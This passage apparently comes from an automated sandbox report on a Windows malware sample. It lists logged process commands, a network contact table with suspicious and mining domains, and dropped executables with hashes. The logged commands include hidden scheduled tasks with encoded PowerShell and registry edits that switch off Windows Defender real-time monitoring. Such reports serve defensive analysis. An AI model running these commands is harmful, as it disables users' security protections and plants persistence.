sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {D21939EB-D0FB-4F65-8521-0FDB9007B582} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\aEedQxU.exe

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\aEedQxU.exe F9 /Yosite_idpIV 385120 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gpZAkITnu" /SC once /ST 06:25:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gpZAkITnu"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gpZAkITnu"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gZJwiPKam" /SC once /ST 06:42:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gZJwiPKam"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
DE 148.251.234.93:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 drivelikea.com udp
US 8.8.8.8:53 update.wf udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 hbn42414.beget.tech udp
US 8.8.8.8:53 lancetjournal.com udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 galandskiyher4.com udp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 grupoeca.co udp
US 85.217.144.143:80 85.217.144.143 tcp
US 188.114.97.0:443 lancetjournal.com tcp
US 8.8.8.8:53 link.storjshare.io udp
US 104.21.93.225:443 flyawayaero.net tcp
US 172.67.187.122:443 lycheepanel.info tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 188.114.96.0:443 lancetjournal.com tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
RU 91.212.166.16:443 update.wf tcp
NL 13.227.219.25:443 downloads.digitalpulsedata.com tcp
RU 87.236.19.5:80 hbn42414.beget.tech tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 winterhunter.org udp
US 172.67.180.173:443 potatogoose.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 104.21.20.38:443 winterhunter.org tcp
NL 194.169.175.127:80 galandskiyher4.com tcp
US 2.18.121.68:80 apps.identrust.com tcp
US 72.29.85.225:443 grupoeca.co tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.97.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 41bcc830-b4dc-43ae-904e-479ff80b331b.uuid.zaoshang.moscow udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 xmr.2miners.com udp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
DE 162.19.139.184:12222 tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 server9.zaoshang.moscow udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 142.251.125.127:19302 stun1.l.google.com udp
BG 185.82.216.49:443 server9.zaoshang.moscow tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 datasheet.fun udp
US 104.21.89.251:80 datasheet.fun tcp
US 142.251.125.127:19302 stun1.l.google.com udp

Files

memory/2112-0-0x00000000012A0000-0x0000000001302000-memory.dmp

memory/2112-1-0x0000000074930000-0x000000007501E000-memory.dmp

memory/2112-2-0x0000000004E80000-0x0000000004EC0000-memory.dmp

memory/2112-3-0x0000000000850000-0x000000000089C000-memory.dmp

memory/2112-4-0x00000000003E0000-0x00000000003FA000-memory.dmp

memory/2628-5-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2628-7-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2628-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2628-13-0x0000000074930000-0x000000007501E000-memory.dmp

memory/2112-10-0x0000000074930000-0x000000007501E000-memory.dmp

memory/2628-14-0x0000000004640000-0x0000000004680000-memory.dmp

memory/2872-15-0x000000006FA10000-0x000000006FFBB000-memory.dmp

memory/2872-17-0x0000000002660000-0x00000000026A0000-memory.dmp

memory/2872-16-0x000000006FA10000-0x000000006FFBB000-memory.dmp

memory/2872-18-0x0000000002660000-0x00000000026A0000-memory.dmp

memory/2872-19-0x0000000002660000-0x00000000026A0000-memory.dmp

memory/2872-27-0x000000006FA10000-0x000000006FFBB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab849D.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar84FD.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9380de300d875fb51938314f38641577
SHA1 a9353a5b0f7b778b92a6bf3ac1746857c22d26ae
SHA256 eabe4c90edd3c296c6bc7d4c373c0735d8afb6e8b3315bace69c57c6ce82649d
SHA512 346ba464dc03bf31f1e74452e8f049fe7931368150a0eac11f12c8f8b8d3559018895dc38a28adbbc922bed53158ac059f389d6773e44da7890c95389530bea5

C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

C:\Users\Admin\Pictures\PTWdf3XUWcjSQWEF4BNvci6u.exe

MD5 d65427c719ba3b877f1225091e14836a
SHA1 327f6a8337b52d568000ee8d63253f4ffd6cb802
SHA256 48fe5c377aabf7a268d1830c7ffc2227936cf4f4ea0ef27c8b46c9ac4af8767c
SHA512 948699d2b1c6e595bd0b89737c91d0aa5cffc9d0756a138315ed36320ce5df6aad4de7d6ecd4ea839f4af2db832fafdca0c22daa4ac29b6f003b235471065655

memory/2628-213-0x000000000B1B0000-0x000000000B6FD000-memory.dmp

C:\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe

MD5 1667ceaa29fa3577b0507f1854ecce26
SHA1 3b26b96f28d7c3d317df53a333c9c189de29cedd
SHA256 4eaa7f9c8c5a52150ec0cf23caf8c7c1eaa230dcd67d022029d0bb3b25c8b5e3
SHA512 a5cfaabf91c237308a6f1410a536c8131282f3e43e0eb1ed7aa01835b27986f1f048466b1d938b1facbc6b13d2a39c4d292f745e4a0ca75438f58192ef68f287

memory/2028-216-0x0000000000940000-0x0000000000E8D000-memory.dmp

C:\Users\Admin\Pictures\7O8fAU20sqOYQEzFUjAPyRvu.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\PTWdf3XUWcjSQWEF4BNvci6u.exe

MD5 d65427c719ba3b877f1225091e14836a
SHA1 327f6a8337b52d568000ee8d63253f4ffd6cb802
SHA256 48fe5c377aabf7a268d1830c7ffc2227936cf4f4ea0ef27c8b46c9ac4af8767c
SHA512 948699d2b1c6e595bd0b89737c91d0aa5cffc9d0756a138315ed36320ce5df6aad4de7d6ecd4ea839f4af2db832fafdca0c22daa4ac29b6f003b235471065655

memory/2628-224-0x0000000074930000-0x000000007501E000-memory.dmp

C:\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe

MD5 1667ceaa29fa3577b0507f1854ecce26
SHA1 3b26b96f28d7c3d317df53a333c9c189de29cedd
SHA256 4eaa7f9c8c5a52150ec0cf23caf8c7c1eaa230dcd67d022029d0bb3b25c8b5e3
SHA512 a5cfaabf91c237308a6f1410a536c8131282f3e43e0eb1ed7aa01835b27986f1f048466b1d938b1facbc6b13d2a39c4d292f745e4a0ca75438f58192ef68f287

memory/1624-225-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2628-226-0x0000000004640000-0x0000000004680000-memory.dmp

C:\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe

MD5 1667ceaa29fa3577b0507f1854ecce26
SHA1 3b26b96f28d7c3d317df53a333c9c189de29cedd
SHA256 4eaa7f9c8c5a52150ec0cf23caf8c7c1eaa230dcd67d022029d0bb3b25c8b5e3
SHA512 a5cfaabf91c237308a6f1410a536c8131282f3e43e0eb1ed7aa01835b27986f1f048466b1d938b1facbc6b13d2a39c4d292f745e4a0ca75438f58192ef68f287

\Users\Admin\Pictures\7O8fAU20sqOYQEzFUjAPyRvu.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

MD5 2a11bdca15f3f99d319ef86ddc187bf7
SHA1 24ec21930bed314c15543a5df6ac05c09f919ef1
SHA256 f65464cc8178573d4318c18454658712bc4d922422c3d0d5fab43d2dfe16cd9e
SHA512 b6944388601fe1c234334a58bf2ba452a5e358f08daffab2af21d55df44df387da241ca672cfa265f8b2bafad29bdf943e1b2d65dafc082fb407550580a840b1

\Users\Admin\AppData\Local\Temp\Opera_installer_2310061406316362028.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe

MD5 1667ceaa29fa3577b0507f1854ecce26
SHA1 3b26b96f28d7c3d317df53a333c9c189de29cedd
SHA256 4eaa7f9c8c5a52150ec0cf23caf8c7c1eaa230dcd67d022029d0bb3b25c8b5e3
SHA512 a5cfaabf91c237308a6f1410a536c8131282f3e43e0eb1ed7aa01835b27986f1f048466b1d938b1facbc6b13d2a39c4d292f745e4a0ca75438f58192ef68f287

\Users\Admin\Pictures\A42NlvCb1QYQ5lfGTJJCvOAa.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\A42NlvCb1QYQ5lfGTJJCvOAa.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

memory/2864-263-0x00000000FF0E0000-0x00000000FF1CC000-memory.dmp

C:\Users\Admin\Pictures\A42NlvCb1QYQ5lfGTJJCvOAa.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\A42NlvCb1QYQ5lfGTJJCvOAa.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\AppData\Local\Temp\is-B79DS.tmp\is-ETILO.tmp

MD5 f1b5055e1e80bf52a48683f85f9298ef
SHA1 26976cc0c690693084466d185c5e84da9870a778
SHA256 0b6381a1fc1ebc6594804042c8bf1ccfac7a9328bba3d3a487e571cbee298e50
SHA512 01290db6ac4dedb15d20fdc80a112b34cbce5c381c8fd262633c662e7927b314bca8063ad6109331d57feb50ed4045c05a7235347bb29edf401f9f867e9237ef

C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

C:\Users\Admin\Pictures\4hwmKH6i0etCyzoS33pO4NxL.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

\Users\Admin\AppData\Local\Temp\is-B79DS.tmp\is-ETILO.tmp

MD5 f1b5055e1e80bf52a48683f85f9298ef
SHA1 26976cc0c690693084466d185c5e84da9870a778
SHA256 0b6381a1fc1ebc6594804042c8bf1ccfac7a9328bba3d3a487e571cbee298e50
SHA512 01290db6ac4dedb15d20fdc80a112b34cbce5c381c8fd262633c662e7927b314bca8063ad6109331d57feb50ed4045c05a7235347bb29edf401f9f867e9237ef

C:\Users\Admin\Pictures\4hwmKH6i0etCyzoS33pO4NxL.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/2808-268-0x0000000000EE0000-0x00000000011FC000-memory.dmp

memory/2808-267-0x0000000074930000-0x000000007501E000-memory.dmp

\Users\Admin\Pictures\4hwmKH6i0etCyzoS33pO4NxL.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

\Users\Admin\Pictures\4hwmKH6i0etCyzoS33pO4NxL.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

MD5 2a11bdca15f3f99d319ef86ddc187bf7
SHA1 24ec21930bed314c15543a5df6ac05c09f919ef1
SHA256 f65464cc8178573d4318c18454658712bc4d922422c3d0d5fab43d2dfe16cd9e
SHA512 b6944388601fe1c234334a58bf2ba452a5e358f08daffab2af21d55df44df387da241ca672cfa265f8b2bafad29bdf943e1b2d65dafc082fb407550580a840b1

\Users\Admin\AppData\Local\Temp\is-3NVSA.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-3NVSA.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2976-280-0x00000000003C0000-0x00000000003C1000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-3NVSA.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-B79DS.tmp\is-ETILO.tmp

MD5 f1b5055e1e80bf52a48683f85f9298ef
SHA1 26976cc0c690693084466d185c5e84da9870a778
SHA256 0b6381a1fc1ebc6594804042c8bf1ccfac7a9328bba3d3a487e571cbee298e50
SHA512 01290db6ac4dedb15d20fdc80a112b34cbce5c381c8fd262633c662e7927b314bca8063ad6109331d57feb50ed4045c05a7235347bb29edf401f9f867e9237ef

\Users\Admin\Pictures\PTWdf3XUWcjSQWEF4BNvci6u.exe

MD5 d65427c719ba3b877f1225091e14836a
SHA1 327f6a8337b52d568000ee8d63253f4ffd6cb802
SHA256 48fe5c377aabf7a268d1830c7ffc2227936cf4f4ea0ef27c8b46c9ac4af8767c
SHA512 948699d2b1c6e595bd0b89737c91d0aa5cffc9d0756a138315ed36320ce5df6aad4de7d6ecd4ea839f4af2db832fafdca0c22daa4ac29b6f003b235471065655

\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

memory/2032-281-0x0000000004030000-0x0000000004428000-memory.dmp

\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

memory/2892-282-0x0000000002380000-0x0000000002480000-memory.dmp

memory/2892-289-0x0000000000220000-0x0000000000229000-memory.dmp

C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

MD5 2a11bdca15f3f99d319ef86ddc187bf7
SHA1 24ec21930bed314c15543a5df6ac05c09f919ef1
SHA256 f65464cc8178573d4318c18454658712bc4d922422c3d0d5fab43d2dfe16cd9e
SHA512 b6944388601fe1c234334a58bf2ba452a5e358f08daffab2af21d55df44df387da241ca672cfa265f8b2bafad29bdf943e1b2d65dafc082fb407550580a840b1

memory/2032-299-0x0000000004030000-0x0000000004428000-memory.dmp

memory/2620-301-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

memory/2032-302-0x0000000004430000-0x0000000004D1B000-memory.dmp

memory/2620-298-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2912-293-0x00000000042D0000-0x00000000046C8000-memory.dmp

memory/2620-306-0x0000000000400000-0x0000000000409000-memory.dmp

\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

MD5 2a11bdca15f3f99d319ef86ddc187bf7
SHA1 24ec21930bed314c15543a5df6ac05c09f919ef1
SHA256 f65464cc8178573d4318c18454658712bc4d922422c3d0d5fab43d2dfe16cd9e
SHA512 b6944388601fe1c234334a58bf2ba452a5e358f08daffab2af21d55df44df387da241ca672cfa265f8b2bafad29bdf943e1b2d65dafc082fb407550580a840b1

C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

C:\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
